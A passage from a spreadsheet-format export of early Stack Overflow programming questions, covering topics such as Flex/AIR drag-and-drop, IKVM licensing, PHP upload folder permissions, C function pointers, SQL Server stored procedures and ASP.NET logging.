&lt;p&gt;Just to make it clear: the areas where the user should be able to drop are not components or even display objects, in fact they are just ranges in the text of a text field (like the selection). Had they been components of their own I could have solved it by making each of them accept drag events individually. I guess I could create proxy components that float over the text to emulate it, but I'd rather not if it isn't necessary.&lt;/p&gt;
&lt;hr&gt;
&lt;p&gt;I've managed to get it working in both AIR and the browser now, but only by putting proxy components on top of the ranges of text where you should be able to drop things. That way I get the right feedback and drops are automatically unaccepted on drag exit.&lt;/p&gt;
&lt;p&gt;This is the oddest thing about D&amp;amp;D in AIR:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;DragManager.doDrag(initiator, source, event, dragImage, offsetX, offsetY);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;In browser-based Flex, &lt;code&gt;offsetX&lt;/code&gt; and &lt;code&gt;offsetY&lt;/code&gt; should be negative (so says the documentation, and it works fine). However, when running &lt;em&gt;exactly the same code&lt;/em&gt; in AIR you have to make the offsets positive. The same numbers, but positive. That is very, very weird.&lt;/p&gt;
&lt;hr&gt;
&lt;p&gt;I've tested some more and what &lt;a href="http://stackoverflow.com/questions/10870/how-can-i-unaccept-a-drag-in-flex#11209"&gt;@maclema&lt;/a&gt; works, but not if you run in AIR. It seems like drag and drop in AIR is different. It's really, really weird because not only is the feedback not showing correctly, and it's not possible to unaccept, but the coordinates are also completely off. I just tried my application in a browser instead of AIR and dragging and dropping is completely broken.&lt;/p&gt;
&lt;p&gt;Also, skipping the &lt;code&gt;dragEnter&lt;/code&gt; handler works fine in AIR, but breaks everything when running in a browser.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Any good advice on using emacs for C++ project?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm looking for a good article on using emacs as C/C++ IDE.&lt;/p&gt;
&lt;p&gt;Something like Steve Yegge's &lt;a href="http://steve.yegge.googlepages.com/effective-emacs"&gt;"Effective emacs"&lt;/a&gt;.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>IKVM and Licensing</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have been looking into IKVMing Apache's FOP project to use with our .NET app.  It's a commercial product, and looking into licensing, IKVM runs into some sticky areas because of its use of GNU Classpath.  From what I've seen, no one can say for sure if this stuff can be used in a commercial product.  Has anyone used IKVM, or an IKVM'd product, in a commercial product?  Here's what I've found so far:&lt;/p&gt;
&lt;p&gt;&lt;a href="http://weblog.ikvm.net/story.aspx/license" rel="nofollow" title="Config Section Generator"&gt;IKVM license page&lt;/a&gt;, which notes that one dll contains code from other projects, their license &lt;a href="http://openjdk.java.net/legal/gplv2+ce.html" rel="nofollow"&gt;GPLv2 + Classpath Exception&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;a href="http://saxon.sourceforge.net/" rel="nofollow"&gt;Saxon for .NET&lt;/a&gt; is generated with IKVM, but released under the Apache license...&lt;/p&gt;
&lt;p&gt;Anyone have experience with this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What are the proper permissions for an upload folder with PHP/Apache?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Sorry for the basic question - I'm a .NET developer and don't have much experience with LAMP setups.&lt;/p&gt;
&lt;p&gt;I have a PHP site that will allow uploads to a specific folder. I have been told that this folder needs to be owned by the webserver user for the upload process to work, so I created the folder and then set permissions as such:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;chown apache:apache -R uploads/
chmod 755 -R uploads/
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The only problem now is that the FTP user can not modify the uploaded files at all.&lt;/p&gt;
&lt;p&gt;Is there a permission setting that will allow me to still upload files and then modify them later as a user other than the webserver user?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How should I unit test a code-generator?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;This is a difficult and open-ended question I know, but I thought I'd throw it to the floor and see if anyone had any interesting suggestions.&lt;/p&gt;
&lt;p&gt;I have developed a code-generator that takes our python interface to our C++ code (generated via SWIG) and generates code needed to expose this as WebServices.  When I developed this code I did it using TDD, but I've found my tests to be brittle as hell.  Because each test essentially wanted to verify that for a given bit of input code (which happens to be a C++ header) I'd get a given bit of outputted code I wrote a small engine that reads test definitions from XML input files and generates test cases from these expectations.&lt;/p&gt;
&lt;p&gt;The problem is I dread going in to modify the code at all.  That and the fact that the unit tests themselves are a: complex, and b: brittle.&lt;/p&gt;
&lt;p&gt;So I'm trying to think of alternative approaches to this problem, and it strikes me I'm perhaps tackling it the wrong way.  Maybe I need to focus more on the outcome, IE: does the code I generate actually run and do what I want it to, rather than, does the code look the way I want it to.&lt;/p&gt;
&lt;p&gt;Has anyone got any experiences of something similar to this they would care to share?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>T-Sql date format for seconds since last epoch / formatting for sqlite input</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm guessing it needs to be something like:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;CONVERT(CHAR(24), lastModified, 101)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;However I'm not sure of the right value for the third parameter.&lt;/p&gt;
&lt;p&gt;Thanks!&lt;/p&gt;
&lt;hr&gt;
&lt;p&gt;Well I'm trying to write a script to copy my sql server db to a sqlite file, which gets downloaded to an air app, which then syncs the data to another sqlite file. I'm having a ton of trouble with dates. If I select a date in air and try to insert it, it fails because it's not in the right format... even if it was a valid date to begin with. I figured I'd try to experiment with the unix time since that's the only thing thats worked so far. I am considering just leaving them as varchar because I don't sort by them anyway.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Passing more parameters in C function pointers</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Let's say I'm creating a chess program. I have a function&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;void foreachMove( void (*action)(chess_move*), chess_game* game);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;which will call the function pointer action on each valid move. This is all well and good, but what if I need to pass more parameters to the action function? For example:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;chess_move getNextMove(chess_game* game, int depth){
  //for each valid move, determine how good the move is
  foreachMove(moveHandler, game);
}
void moveHandler(chess_move* move){
  //uh oh, now I need the variables "game" and "depth" from the above function
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Redefining the function pointer is not the optimal solution. The foreachMove function is versatile and many different places in the code reference it. It doesn't make sense for each one of those references to have to update their function to include parameters that they don't need.&lt;/p&gt;
&lt;p&gt;How can I pass extra parameters to a function that I'm calling through a pointer?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What version of .Net framework ships with SQL Server 2008?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Does SQL Server 2008 ship with the .NET 3.5 CLR, so that stored procedures written in CLR can use 3.5 features?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>ASP.NET Proxy Application</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Let me try to explain what I need. I have a server that is visible from the internet. What I need is to create a ASP.NET application that get the request of a web Site and send to a internal server, then it gets the response and publish the the info. For the client this should be totally transparent.&lt;/p&gt;
&lt;p&gt;For different reasons I cannot redirect the port to the internal server. What I can do but no know how - maybe the answer is there - is to create a new Web Site that its host in the other server.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Speeding up an ASP.Net Web Site or Application</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have an Ajax.Net enabled ASP.Net 2.0 web site. Hosting for both the site and the database are out of my control as is the database's schema. In testing on hardware I do control the site performs well however on the client's hardware, there are noticeable delays when reloading or changing pages. &lt;/p&gt;
&lt;p&gt;What I would like to do is make my application as compact and speedy as possible when I deliver it. One idea is to set expiration dates for all of the site's static resources so they aren't recalled on page loads. By resources I mean images, linked style sheets and JavaScript source files. Is there an easy way to do this?&lt;/p&gt;
&lt;p&gt;What other ways are there to optimize a .Net web site?&lt;/p&gt;
&lt;p&gt;UPDATE: 
I've run YSlow on the site and the areas where I am getting hit the hardest are in the number of JavaScript and Style Sheets being loaded (23 JS files and 5 style sheets). All but one (the main style sheet) has been inserted by Ajax.net and Asp. Why so many? &lt;/p&gt;
</t>
  </si>
  <si>
    <t>What are the list of Resharper like plugins for VS I should consider?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;My license for Whole Tomatoes Visual AssistX is about to expire and I'm not really planning on renewing it.  I use it for spell checking but that's about it.  The refactoring abilities have been a little disappointing.  Before I just jump into Resharper though what are your thoughts on other possible plugins?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do you kill all current connections to a SQL Server 2005 database?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I want to rename a database, but keep getting the error that 'couldn't get exclusive lock' on the database, which implies there is some connection(s) still active.&lt;/p&gt;
&lt;p&gt;How can I kill all the connections to the database so that I can rename it?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Design pattern for parsing binary file data and storing in a database</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Does anybody recommend a design pattern for taking a binary data file, parsing parts of it into objects and storing the resultant data into a database?  &lt;/p&gt;
&lt;p&gt;I think a similar pattern could be used for taking an XML or tab-delimited file and parse it into their representative objects.&lt;/p&gt;
&lt;p&gt;A common data structure would include:&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;(Header) (DataElement1) (DataElement1SubData1) (DataElement1SubData2)(DataElement2) (DataElement2SubData1) (DataElement2SubData2) (EOF)&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;I think a good design would include a way to change out the parsing definition based on the file type or some defined metadata included in the header.  So a &lt;a href="http://www.oodesign.com/factory-method-pattern.html" rel="nofollow"&gt;Factory Pattern&lt;/a&gt; would be part of the overall design for the Parser part.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I get Unicode characters to display properly for the tooltip for the IMG ALT in IE7?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've got some Japanese in the ALT attribute, but the tooltip is showing me the ugly block characters in the tooltip.  The rest of the content on the page renders correctly.  So far, it seems to be limited to the tooltips.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I create virtual machines as part of a build process using MSBuild and MS Virtual Server and/or Hyper-V Server Virtualization?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What I would like to do is create a clean virtual machine image as the output of a build of an application.&lt;/p&gt;
&lt;p&gt;So a new virtual machine would be created (from a template is fine, with the OS installed, and some base software installed) --- a new web site would be created in IIS, and the web app build output copied to a location on the virtual machine hard disk, and IIS configured correctly, the VM would start up and run.&lt;/p&gt;
&lt;p&gt;I know there are MSBuild tasks to script all the administrative actions in IIS, but how do you script all the actions with Virtual machines?  Specifically, creating a new virtual machine from a template, naming it uniquely, starting it, configuring it, etc...&lt;/p&gt;
&lt;p&gt;Specifically I was wondering if anyone has successfully implemented any VM scripting as part of a build process.&lt;/p&gt;
&lt;p&gt;Update: I assume with Hyper-V, there is a different set of libraries/APIs to script virtual machines, anyone played around with this?  And anyone with real practical experience of doing something like this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Configurable Table Prefixes with a .Net OR/M?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In a web application like wiki or forums or blogging software, it is often useful to store your data in a relational database. Since many hosting companies offer a single database with their hosting plans (with additional databases costing extra) it is very useful for your users when your database objects (tables, views, constraints, and stored procedures) have a common prefix. It is typical for applications aware of database scarcity to have a hard-coded table prefix. I want more, however. Specifically, I'd like to have a table prefix that users can designate&amp;mdash;say in the web.config file (with an appropriate default, of course).&lt;/p&gt;
&lt;p&gt;Since I hate coding &lt;a href="http://en.wikipedia.org/wiki/Create%2C_read%2C_update_and_delete" rel="nofollow"&gt;CRUD&lt;/a&gt; operations by hand, I prefer to work through a competent OR/M and have used (and enjoyed) LINQ to SQL, Subsonic, and ADO.Net. I'm having some thrash in a new project, however, when it comes to putting a table prefix in a user's web.config file. Are there any .Net-based OR/M products that can handle this scenario elegantly?&lt;/p&gt;
&lt;p&gt;The best I have been able to come up with so far is using LINQ to SQL with an external mapping file that I'd have to update somehow based on an as-yet hypothetical web.config setting.&lt;/p&gt;
&lt;p&gt;Anyone have a better solution? I tried to make it happen in Entity Framework, but that turned into a mess quickly. (Due to my unfamiliarity with EF? Possibly.) How about SubSonic? Does it have an option to apply a table prefix besides at code generation time?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How much extra overhead is generated when sending a file over a web service as a byte array?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;This &lt;a href="http://stackoverflow.com/questions/11782/file-uploads-via-web-services" rel="nofollow" title="excanvas"&gt;question and answer&lt;/a&gt; shows how to send a file as a byte array through an XML web service. How much overhead is generated by using this method for file transfer?  I assume the data looks something like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;?xml version="1.0" encoding="UTF-8" ?&amp;gt;
&amp;lt;bytes&amp;gt;
    &amp;lt;byte&amp;gt;16&amp;lt;/byte&amp;gt;
    &amp;lt;byte&amp;gt;28&amp;lt;/byte&amp;gt;
    &amp;lt;byte&amp;gt;127&amp;lt;/byte&amp;gt;
    ...
&amp;lt;/bytes&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;If this format is correct, the bytes must first be converted to UTF-8 characters. Each of these characters allocates 8 bytes. Are the bytes stored in base 10, hex, or binary characters? How much larger does the file appear as it is being sent due to the XML data and character encoding? Is compression built into web services?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I determine the IP of my router/gateway in Java?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How can I determine the IP of my router/gateway in Java? I can get my IP easily enough. I can get my internet IP using a service on a website. But how can I determine my gateway's IP?&lt;/p&gt;
&lt;p&gt;This is somewhat easy in .NET if you know your way around. But how do you do it in Java?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do you log errors (Exceptions) in your ASP.NET apps?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm looking for the best way to log errors in an ASP.NET application.
I want to be able to receive emails when errors occurs in my application, with detailed information about the Exception and the current Request.&lt;/p&gt;
&lt;p&gt;In my company we used to have our own ErrorMailer, catching everything in the Global.asax Application_Error. It was "Ok" but not very flexible nor configurable.&lt;/p&gt;
&lt;p&gt;We swithed recently to NLog. It's much more configurable, we can define different targets for the errors, filter them, buffer them (not tried yet). It's a very good improvement.&lt;/p&gt;
&lt;p&gt;But I discovered lately that there's a whole Namespace in the .Net framework for this purpose : &lt;a href="http://msdn.microsoft.com/en-us/library/system.web.management.aspx"&gt;System.Web.Management&lt;/a&gt; and it can be configured in the &lt;a href="http://msdn.microsoft.com/en-us/library/2fwh2ss9(VS.80).aspx"&gt;healthMonitoring&lt;/a&gt; section of web.config.&lt;/p&gt;
&lt;p&gt;Have you ever worked with .Net health monitoring? What is your solution for error logging?&lt;/p&gt;
&lt;p&gt;Thanks,&lt;/p&gt;
&lt;p&gt;Vincent&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Access to global application settings</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;A database application that I'm currently working on, stores all sorts of settings in the database. Most of those settings are there to customize certain business rules, but there's also some other stuff in there.&lt;/p&gt;
&lt;p&gt;The app contains objects that specifically do a certain task, e.g., a certain complicated calculation. Those non-UI objects are unit-tested, but also need access to lots of those global settings. The way we've implemented this right now, is by giving the objects properties that are filled by the Application Controller at runtime. When testing, we create the objects in the test and fill in values for testing (not from the database).&lt;/p&gt;
&lt;p&gt;This works better, in any case much better than having all those objects need some global &lt;em&gt;Settings&lt;/em&gt; object --- that of course effectively makes unit testing impossible :) Disadvantage can be that you sometimes need to set a dozen of properties, or that you need to let those properties 'percolate' into sub-objects.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;So the general question is&lt;/strong&gt;: how do you provide access to global application settings in your projects, without the need for global variables, while still being able to unit test your code? This must be a problem that's been solved 100's of times...&lt;/p&gt;
&lt;p&gt;(Note: I'm not too much of an experienced programmer, as you'll have noticed; but I love to learn! And of course, I've already done research into this topic, but I'm really looking for some first-hand experiences)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Considering N2 CMS but worried about performance. Is this justified?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Hy, does anyone worked with N2 Content Management System(&lt;a href="http://www.codeplex.com/n2" rel="nofollow"&gt;http://www.codeplex.com/n2&lt;/a&gt;).
If yes, how does it perform, performance wise(under heavy load)?
It seems pretty simple and easy to use.&lt;/p&gt;
&lt;p&gt;Adrian&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Programmatically list WMI classes and their properties</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Hey everyone, 
Is there any known way of listing the WMI classes and their properties available for a particular system? Im interested in a vbscript approach, but please suggest anything really :)&lt;/p&gt;
&lt;p&gt;P.S. Great site.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Add .NET 2.0 SP1 as a prerequisite for deployment project</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a .NET 2.0 application that has recently had contributions that are Service Pack 1 dependent.  The deployment project has detected .NET 2.0 as a prerequisite, but NOT SP1.  How do I include SP1 as a dependency/prerequisite in my deployment project?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Arrays of Arrays in Java</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;This is a nasty one for me...  I'm a PHP guy working in Java on a JSP project.  I know how to do what I'm attempting through too much code and a complete lack of finesse.   I'd prefer to do it RIGHT. :) Here is the situation:&lt;/p&gt;
&lt;p&gt;I'm writing a small display to show customers what days they can water their lawns based on their watering group (ABCDE) and what time of year it is.  Our seasons look like this:
Summer (5-1 to 8-31) 
Spring  (3-1 to 4-30) 
Fall (9-1 to 10-31)
Winter (11-1 to 2-28) &lt;/p&gt;
&lt;p&gt;An example might be:&lt;/p&gt;
&lt;p&gt;If I'm in group A, here would be my allowed times:
Winter: Mondays only
Spring: Tues, Thurs, Sat
Summer: Any Day
Fall: Tues, Thurs, Sat&lt;/p&gt;
&lt;p&gt;If I was writing this in PHP I would use arrays like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;//M=Monday,t=Tuesday,T=Thursday.... etc
$schedule["A"]["Winter"]='M';
$schedule["A"]["Spring"]='tTS';
$schedule["A"]["Summer"]='Any';
$schedule["A"]["Fall"]='tTS';
$schedule["B"]["Winter"]='t';
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I COULD make the days arrays (array("Tuesday","Thursday","Saturday")) etc, but it is not necessary for what I'm really trying to accomplish.&lt;/p&gt;
&lt;p&gt;I will also need to setup arrays to determine what season I'm in:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$seasons["Summer"]["start"]=0501;
$seasons["Summer"]["end"]=0801;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Can anyone suggest a really cool way to do this? I will have today's date and the group letter.  I will need to get out of my function a day (M) or a series of days (tTS), (Any).&lt;/p&gt;
&lt;p&gt;Thanks, folks!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Large Data Sets</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm always looking for large data sets to test various types of programs on. Does anyone have any suggestions?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What is a good way to denormalize a mysql database?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a large database of normalized order data that is becoming very slow to query for reporting.  Many of the queries that I use in reports join five or six tables and are having to examine tens or hundreds of thousands of lines.&lt;/p&gt;
&lt;p&gt;There are lots of queries and most have been optimized as much as possible to reduce server load and increase speed.  I think it's time to start keeping a copy of the data in a denormalized format.&lt;/p&gt;
&lt;p&gt;Any ideas on an approach?  Should I start with a couple of my worst queries and go from there?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to setup site-wide variables in php?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I want to define something like this in &lt;em&gt;php&lt;/em&gt;:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$EL = "\n&amp;lt;br /&amp;gt;\n";
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;and then use that variable as an "endline" marker all over my site, like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;echo "Blah blah blah{$EL}";
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;How do I define $EL once (in only 1 file), include it on every page on my site, and &lt;em&gt;not&lt;/em&gt; have to reference it using the (strangely backwards) &lt;code&gt;global $EL;&lt;/code&gt; statement in every page function?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What do ref, val and out mean on method parameters?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm looking for a clear, concise and accurate answer.  &lt;/p&gt;
&lt;p&gt;Ideally as the actual answer, although links to good explanations welcome.&lt;/p&gt;
&lt;p&gt;This also applies to VB.Net, but the keywords are different - &lt;code&gt;ByRef&lt;/code&gt; and &lt;code&gt;ByVal&lt;/code&gt;.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Best practice for webservices</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've created a webservice and when I want to use its methods I instantiate it in the a procedure, call the method, and I finally I dispose it, however I think also it could be okay to instantiate the webservice in the "private void Main_Load(object sender, EventArgs e)" event.&lt;/p&gt;
&lt;p&gt;The thing is that if I do it the first way I have to instantiate the webservice every time I need one of its methods but in the other way I have to keep a webservice connected all the time when I use it in a form for example. &lt;/p&gt;
&lt;p&gt;I would like to know which of these practices are better or if there's a much better way to do it&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Strategy 1&lt;/strong&gt;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;private void btnRead_Click(object sender, EventArgs e)
{
    try
    {
        //Show clock
        this.picResult.Image = new Bitmap(pathWait);
        Application.DoEvents();
        //Connect to webservice
        svc = new ForPocketPC.ServiceForPocketPC();
        svc.Credentials = new System.Net.NetworkCredential(Settings.UserName, Settings.Password);
        svc.AllowAutoRedirect = false;
        svc.UserAgent = Settings.UserAgent;
        svc.PreAuthenticate = true;
        svc.Url = Settings.Url;
        svc.Timeout = System.Threading.Timeout.Infinite;
        svc.CallMethod();
         ...
    }
    catch (Exception ex)
    {
        ShowError(ex);
    }
    finally
    {
        if (svc != null)
            svc.Dispose();
    }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;strong&gt;Strategy 2&lt;/strong&gt;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;private myWebservice svc;
private void Main_Load(object sender, EventArgs e)
{
    //Connect to webservice
    svc = new ForPocketPC.ServiceForPocketPC();
    svc.Credentials = new System.Net.NetworkCredential(Settings.UserName, Settings.Password);
    svc.AllowAutoRedirect = false;
    svc.UserAgent = Settings.UserAgent;
    svc.PreAuthenticate = true;
    svc.Url = Settings.Url;
    svc.Timeout = System.Threading.Timeout.Infinite;
}
private void btnRead_Click(object sender, EventArgs e)
{
    try
    {
        //Show clock
        this.picResult.Image = new Bitmap(pathWait);
        Application.DoEvents();
        svc.CallMethod();
         ...
    }
    catch (Exception ex)
    {
        ShowError(ex);
    }
}
private void Main_Closing(object sender, CancelEventArgs e)
{
    svc.Dispose();
}
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>A ThreadStateException occures when trying to restart a thread</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;From time to time I get a System.Threading.ThreadStateException when attempting to restart a thread. The code in question is as follows:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;// Make sure the thread is done stopping
while (this.mThread.ThreadState == ThreadState.Running)
{ 
    Thread.Sleep(0);
}
// Respawn a thread if the current one is stopped or doesn't exist
if (this.mThread == null || this.mThread.ThreadState == ThreadState.Stopped)
{ 
    this.mThread = new Thread(new ParameterizedThreadStart(Monitor)); }
// Start the thread
if (check)
{ 
    this.mThread.Start(60000); 
}
else
{   
    this.mThread.Start(0); 
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;So two questions - is this the correct way of doing things, and  it is, is there a way to prevent the error from occurring?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I integrate my continuous integration system with my bug tracking system?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I use cruisecontrol.rb for CI and FogBugz for bug tracking, but the more general the answers, the better.&lt;/p&gt;
&lt;p&gt;First is the technical problem: is there an API for FogBugz?  Are there good tutorials, or better yet, pre-written code?&lt;/p&gt;
&lt;p&gt;Second is the procedural problem: what, exactly, should the CI put in the bug tracker when the build breaks?  Perhaps:&lt;/p&gt;
&lt;p&gt;Title: "#{last committer} broke the build!"&lt;/p&gt;
&lt;p&gt;Body: "#{ error traces }"&lt;/p&gt;
&lt;p&gt;I suppose this presupposes the answer to this question: should I even put CI breaks into my bug tracking?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Does CruiseControl.NET run on IIS 7.0?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm new to development (an admin by trade) and I'm setting up my development environment and I would like to set up a CruiseControl.Net server on Server 2008.  A quick Google did not turn up any instructions for getting it running on IIS 7.0, so I was wondering if anyone had experience getting this set up.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>The theory (and terminology) behind Source Control</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've tried using source control for a couple projects but still don't really understand it.  For these projects, we've used TortoiseSVN and have only had one line of revisions.  (No trunk, branch, or any of that.)  If there is a recommended way to set up source control systems, what are they?  What are the reasons and benifits for setting it up that way?  What is the underlying differences between the workings of a centralized and distributed source control system?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Purpose of {1} in this regular expression to match url protocols</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I was reading &lt;a href="http://stackoverflow.com/questions/6173/regular-expression-for-parsing-links-from-a-webpage"&gt;this question&lt;/a&gt; about how to parse URLs out of web pages and had a question about the &lt;a href="http://stackoverflow.com/questions/6173/regular-expression-for-parsing-links-from-a-webpage#6183"&gt;accepted answer&lt;/a&gt; which offered this solution:&lt;/p&gt;
&lt;pre class="lang-none prettyprint-override"&gt;&lt;code&gt;((mailto\:|(news|(ht|f)tp(s?))\://){1}\S+)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The solution was offered by &lt;a href="http://stackoverflow.com/users/350/csmba"&gt;csmba&lt;/a&gt; and he credited it to &lt;a href="http://regexlib.com/Search.aspx?k=URL" rel="nofollow"&gt;regexlib.com&lt;/a&gt;. Whew. Credits done.&lt;/p&gt;
&lt;p&gt;I think this is a fairly naive regular expression but it's a fine starting point for building something better.  But, my question is this:&lt;/p&gt;
&lt;p&gt;What is the point of &lt;code&gt;{1}&lt;/code&gt;? It means "exactly one of the previous grouping", right? Isn't that the default behavior of a grouping in a regular expression? Would the expression be changed in any way if the &lt;code&gt;{1}&lt;/code&gt; were removed?&lt;/p&gt;
&lt;p&gt;If I saw this from a coworker I would point out his or her error but as I write this the response is rated at a 6 and the expression on regexlib.com is rated a 4 of 5. So maybe I'm missing something?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Insert Update stored proc on SQL Server</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've written a stored proc that will do an update if a record exists, otherwise it will do an insert. It looks something like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;update myTable set Col1=@col1, Col2=@col2 where ID=@ID
if @@rowcount = 0
insert into myTable (Col1, Col2) values (@col1, @col2)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;My logic behind writing it in this way is that the update will perform an implicit select using the where clause and if that returns 0 then the insert will take place.&lt;/p&gt;
&lt;p&gt;The alternative to doing it this way would be to do a select and then based on the number of rows returned either do an update or insert. This I considered inefficient because if you are to do an update it will cause 2 selects (the first explicit select call and the second implicit in the where of the update). If the proc were to do an insert then there'd be no difference in efficiency.&lt;/p&gt;
&lt;p&gt;Is my logic sound here?
Is this how you would combine an insert and update into a stored proc?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>CASE tools</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I was using a CASE called &lt;a href="http://www.magicsoftware.com/" rel="nofollow"&gt;MAGIC&lt;/a&gt; for a system I'm developing, I've never used this kind of tool before and at first sight I liked, a month later I had a lot of the application generated, I felt very productive and ... I would say ... satisfied.&lt;/p&gt;
&lt;p&gt;In some way a felt uncomfortable, cause, there is no code and everything I was used to, but in the other hand I could speed up my developing. The fact is that eventually I returned to use C# because I find it more flexible to develop, I can make unit testing, use CVS, I have access to more resources and basically I had "all the control". I felt that this tool didn't give me confidence and I thought that later in the project I could not manage it due to its forced established rules of development. And also a lot of things like sending emails, using my own controls, and other things had their complication, it seemed that at some point it was not going to be as easy as initially I thought and as initially the product claims. This reminds me a very nice article called "&lt;a href="http://www.virtualschool.edu/mon/SoftwareEngineering/BrooksNoSilverBullet.html" rel="nofollow"&gt;No Silver Bullet&lt;/a&gt;".&lt;/p&gt;
&lt;p&gt;This CASE had its advantages but on the other hand it doesn't have resources you can consult and actually the license and certification are very expensive. For me another dissapointing thing is that because of its simplistic approach for development I felt scared on first hand cause of my unexperience on these kind of tools and second cause I thought that if I continued using it maybe it would have turned to be a complex monster that I could not manage later in the project.&lt;/p&gt;
&lt;p&gt;I think its good to use these kind of solutions to speed up things but I wonder, why aren't these programs as popular as VS.Net, J2EE, Ruby, Python, etc. if they claim to enhace productivity better than the tools I've pointed?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Speed difference in using inline strings vs concatenation in php5?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;(assume php5) consider&lt;/p&gt;
